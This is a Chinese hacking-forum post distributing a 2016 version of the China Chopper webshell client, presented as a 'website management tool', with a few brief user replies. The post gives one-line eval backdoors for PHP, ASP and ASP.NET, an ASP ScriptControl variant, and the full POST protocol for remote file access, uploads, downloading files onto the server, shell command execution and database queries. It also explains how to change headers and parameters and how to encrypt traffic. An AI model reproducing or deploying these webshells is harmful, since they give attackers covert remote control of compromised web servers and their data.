请选择 进入手机版 | 继续访问电脑版
查看: 806|回复: 26

[工具专区] 20160620最新中国菜刀

[复制链接]
  • TA的每日心情
    难过
    2017-5-27 16:48
  • 签到天数: 85 天

    [LV.6]常住居民II

    发表于 2016-6-21 08:50:30 | 显示全部楼层 |阅读模式
    菜刀更新了
    -------------------------------------------
         菜刀,他是一款专业的网站管理工具
    -------------------------------------------

    一、网站管理模块
    ----------------

        放在网站上的脚本程序分两种:

      1)“一句话(Eval)”:
            PHP, ASP, ASP.NET 的网站都可以,支持https。下面的代码放在网站目录即可开始管理,比FTP好用多了是不是:
      
    1. PHP:    <?php @eval($_POST['caidao']);?>
    2.           ASP:    <%eval request("caidao")%>
    3.           ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["caidao"],"unsafe");%>
    复制代码


        2)自己开发的脚本程序(Customize):

            理论上支持所有动态脚本,只要正确与菜刀进行交互即可。调用方法请参阅后面的 “Customize模式菜刀和服务端通信接口”。


        ---------------------------------------------------------------------------------------------------------

           
      常用功能介绍

              1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;

              2. 虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份,分别提交。

              3. 数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,POSTGRESQL,ACCESS, 以及支持ADO方式连接的数据库。

               4. 自写脚本(只有Eval端才支持):

                    通过简单编码后提交用户自己的脚本到服务端执行,实现丰富的功能,也可选择发送到浏览器执行。

                    如果要写自己的CCC脚本,可以参考一下CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本。

                    可以在官网下载别人的CCC脚本,或分享你的得意之作。


      配置框填写说明

            ----------------
            A)  数据库相关:
            ----------------
    1. PHP:
    2.         <T>类型</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX,POSTGRESQL中的一种
    3.         <H>主机地址<H> 主机地址可为机器名或IP地址,如localhost
    4.         <U>数据库用户</U> 连接数据库的用户名,如root
    5.         <P>数据库密码</P> 连接数据库的密码,如123455
    6.         <N>默认库</N> 默认连接的库名

    7.         <L>utf8</L> 这一项数据库类型为MYSQL脚本为PHP时可选,不填则为latin1

    8.         ASP 和 ASP.NET:
    9.         <T>类型</T> 类型只能填ADO
    10.         <C>ADO配置信息</C>
    11.         ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
    12.                 Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456;

    13.         Customize:
    14.         <T>类型</T> 类型只能填XDB
    15.         <X>与Customize 脚本约定的配置信息</X>
    16.         菜刀自带的Customize.jsp数据库参数填写方法如下(两行):
    17.         MSSQL:
    18.                 <X>
    19.                 com.microsoft.sqlserver.jdbc.SQLServerDriver
    20.                 jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456
    21.                 </X>
    22.         MYSQL:
    23.                 <X>
    24.                 com.mysql.jdbc.Driver
    25.                 jdbc:mysql://localhost/test?user=root&password=123456
    26.                 </X>
    27.         ORACLE:
    28.                 <X>
    29.                 oracle.jdbc.driver.OracleDriver
    30.                 jdbc:oracle:thin:user/password@127.0.0.1:1521/test
    31.                 </X>

    32.         -------------
    33.         B) 其它配置:
    34.         -------------

    35.         添加额外附加提交的数据,如ASP的新服务端是这样的:
    36.         <%
    37.         Set o = Server.CreateObject("ScriptControl")
    38.         o.language = "vbscript"
    39.         o.addcode(Request("SC"))
    40.         o.run "ff",Server,Response,Request,Application,Session,Error
    41.         %>
    42.         那么,菜刀在配置处填入:
    43.         <O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("caidao")):end+function</O>
    44.         然后以密码caidao来连接即可。

    45.         默认终端程序路径设置示例:
    46.         <SHELL>/bin/sh</SHELL>

    47.         虚拟终端默认命令设置示例:
    48.         <CMD>whoami</CMD>

    49.         文件管理默认打开的目录设置示例:
    50.         <CD>c:\windows\temp\</CD>


    51.   如果你网站开通了HTTP登录验证,可以这样填地址:

    52.         [url]http://user:pass@maicaidao.com/admin.asp[/url]
    53.         用户名密码中的特殊字符可用URL编码转换。
    复制代码


        【20160620后的版本多了个文件caidao.conf】

         这个文件是必须有的,里面的各节点一个也不能删,不然程序运行会出错!
         默认调用的是caidao.conf,菜单里有个“加载配置文件”的菜单项,可以切换配置文件。
         这个文件必须存为UNICODE编码!
         各节点简单介绍一下:
    1. <FLAG>        返回的内容分隔符,只限三个字符,用生辟点的字符吧。
    2.         <UA>        自定义User-Agent的值
    3.         <K1>        POST的第一个参数名称,不再是原版本固定的z1
    4.         <K2>        同上

    5.         <PHP_BASE>        这是PHP脚本的基本代码,其它的功能代码最终会传到这里面,注意里面的%s %d这样的参数
    6.         <ASP_BASE>        同上
    7.         <ASPX_BASE>        同上
    8.         <PHP_BASE.加密示例>        这个不会用到,如果临时复制出来一个节点,可以取一个不同的节点名字,不要重名了。
    9.                 这里示范的是如何把PHP_BASE的内容加密发送。
    10.                 相信你会做得更好。
    11.         <GETBASEINFO>
    12.         <SHOWFOLDER>
    13.         <SHOWTXTFILE>
    14.         <SAVETXTFILE>
    15.         <DELETEFILE>
    16.         <DOWNFILE>
    17.         <UPLOADFILE>
    18.         <PASTEFILE>
    19.         <NEWFOLDER>
    20.         <WGET>
    21.         <SHELL>
    22.         <RENAME>
    23.         <SETTIME>
    24.         -----------上面这些,你懂的,就不费篇幅了
    25.         <DB_PHP_MYSQL_DBLIST>                PHP脚本刚连接时调用这里,给出库列表
    26.         <DB_PHP_MYSQL_TABLELIST>        点击库调用,显示数据表
    27.         <DB_PHP_MYSQL_COLUMNLIST>        点击数据表调用,显示数据表字段
    28.         <DB_PHP_MYSQL_EXECUTESQL>        执行SQL,分别处理查询和执行并给出结果。
    29.         ....
    30.         接下来的几样都是PHP连其它库的,大同小异。
    31.         <DB_ASP_ADO_DBLIST>
    32.         <DB_ASP_ADO_TABLELIST>
    33.         <DB_ASP_ADO_COLUMNLIST>
    34.         <DB_ASP_ADO_EXECUTESQL>
    35.         上面是ASP管理数据库的脚本,用ADO来整的。
    36.         <DB_ASPX_ADO_DBLIST>
    37.         <DB_ASPX_ADO_TABLELIST>
    38.         <DB_ASPX_ADO_COLUMNLIST>
    39.         <DB_ASPX_ADO_EXECUTESQL>
    复制代码

            ASPX的,当然还有其它好用的方式,看你的习惯来改了。

    二、记事本
    ----------

            忽然觉得有个地方记录点东西还是挺方便的。


    三、浏览器
    ----------

            就是一个专用的网页浏览器,
            Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
            如果有ip.dat库,在状态栏会显示此网站的IP,国家代码。

    ----------         ----------
    新版本去掉了一些不想用的功能,
    -----------         ----------


    文件说明:
    ------------------------------------------------------------------
    caidao.exe        菜刀程序
    db.mdb                菜刀的主数据库
    caidao.conf        配置文件(重要,千万别删除)
    ------------------------------------------------------------------
    cache.tmp        菜刀的缓存数据库(可删除)
    readme.txt        你现在正在看的(可删除)
    ip.dat                一个IP库,用于IP地址识别(可删除)
    <CCC>                菜刀的自写脚本目录(可删除)
    <Customize>        Customize模式的服务端(可删除)
            Customize.aspx        这是一个C#的示例服务端(全功能)
            Customize.jsp        这是一个jsp的示例服务端(全功能)
            Customize.cfm        这是一个cfm的示例服务端(文件管理,虚拟终端)






    -------------------------------------
    附:Customize模式菜刀和服务端通信接口
    -------------------------------------

    其它语言的服务端代码可按此接口来编写(请参照Customize.jsp/Customize.cfm/Customize.aspx)

    例:菜刀客户端填写的密码为pass,网页编码选的是GB2312(Jsp服务端会用到此参数)
    注:所有参数都以POST提交,
            返回的数据都要以配置文件caidao.conf中的FLAG节点填写的标记分隔
            提交的参数z0.z1.z2...
    注:返回的错误信息开头包含ERROR://
    注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车
    注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
    ---------------------------------------------------------------------------------------

    [得到当前目录的绝对路径]
    1. 提交:pass=A&z0=GB2312
    2. 返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表
    3. 示例:c:\inetpub\wwwroot\        C:D:E:K:
    4. 示例:/var/www/html/       
    复制代码

    [目录浏览]
    提交:pass=B&z0=GB2312&z1=目录绝对路径
    返回:先目录后文件,目录名后要加/,文件名后不要加/
    示例:
            目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n
            文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n

    [读取文本文件]
    提交:pass=C&z0=GB2312&z1=文件绝对路径
    返回:文本文件的内容

    [写入文本文件]
    提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容
    返回:成功返回1,不成功返回错误信息

    [删除文件或目录]
    提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径
    返回:成功返回1,不成功返回错误信息

    [下载文件]
    提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径
    返回:要下载文件的内容

    [上传文件]
    提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式)
    返回:要下载文件的内容

    [复制文件或目录后粘贴]
    提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径
    返回:成功返回1,不成功返回错误信息

    [文件或目录重命名]
    提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)
    返回:成功返回1,不成功返回错误信息

    [新建目录]
    提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)
    返回:成功返回1,不成功返回错误信息

    [修改文件或目录时间]
    提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-dd HH:mm:ss)
    返回:成功返回1,不成功返回错误信息

    [下载文件到服务器]
    提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径
    返回:成功返回1,不成功返回错误信息

    [执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]
    提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令
    返回:命令执行结果

    [得到数据库基本信息]
    提交:pass=N&z0=GB2312&z1=数据库配置信息
    返回:成功返回数据库(以制表符\t分隔), 不成功返回错误信息

    [获取数据库表名]
    提交:pass=O&z0=GB2312&z1=数据库配置信息\r\n数据库名
    返回:成功返回数据表(以\t分隔), 不成功返回错误信息

    [获取数据表列名]
    提交:pass=P&z0=GB2312&z1=数据库配置信息\r\n数据库名\r\n数据表名
    返回:成功返回数据列(以制表符\t分隔), 不成功返回错误信息

    [执行数据库命令]
    提交:pass=Q&z0=GB2312&z1=数据库配置信息\r\n数据库名&z2=SQL命令
    返回:成功返回数据表内容, 不成功返回错误信息
    注意:返回的第一行为表头,接下去每行分别在列表中显示,列数要求一致。行中的每列后加上\t|\t标记,每行以标记\r\n为结束

    游客,如果您要查看本帖隐藏内容请回复

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-5-30 17:06
  • 签到天数: 399 天

    [LV.9]以坛为家II

    发表于 2016-6-21 10:05:25 | 显示全部楼层

    RE: 20160620最新中国菜刀

    本帖最后由 昊情· 于 2016-6-21 10:31 编辑

    为了隐私安全最好不要使用该程序
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    8 小时前
  • 签到天数: 305 天

    [LV.8]以坛为家I

    发表于 2016-6-21 10:13:58 | 显示全部楼层
    无语的论坛表情。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2016-7-22 09:39
  • 签到天数: 90 天

    [LV.6]常住居民II

    发表于 2016-6-21 11:35:40 | 显示全部楼层

    RE: 20160620最新中国菜刀

    经典  牛逼 好东西
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2017-4-14 17:32
  • 签到天数: 126 天

    [LV.7]常住居民III

    发表于 2016-6-21 12:08:37 | 显示全部楼层
    我就看看不说话
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2017-4-24 19:24
  • 签到天数: 287 天

    [LV.8]以坛为家I

    发表于 2016-6-21 12:24:45 | 显示全部楼层

    RE: 20160620最新中国菜刀

    为了隐私安全最好不要使用该程序
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-4-19 19:04
  • 签到天数: 224 天

    [LV.7]常住居民III

    发表于 2016-6-21 14:57:32 | 显示全部楼层

    RE: 20160620最新中国菜刀

    看来我还是晚了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    6 天前
  • 签到天数: 132 天

    [LV.7]常住居民III

    发表于 2016-6-21 22:44:24 | 显示全部楼层
    来看看 菜刀咋样
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2017-2-16 19:49
  • 签到天数: 133 天

    [LV.7]常住居民III

    发表于 2016-6-22 21:41:45 | 显示全部楼层

    RE: 20160620最新中国菜刀

    不是说菜刀作者不更新了吗
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2017-6-6 17:06
  • 签到天数: 314 天

    [LV.8]以坛为家I

    发表于 2016-6-23 00:51:12 | 显示全部楼层
    对菜刀比较敏感
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表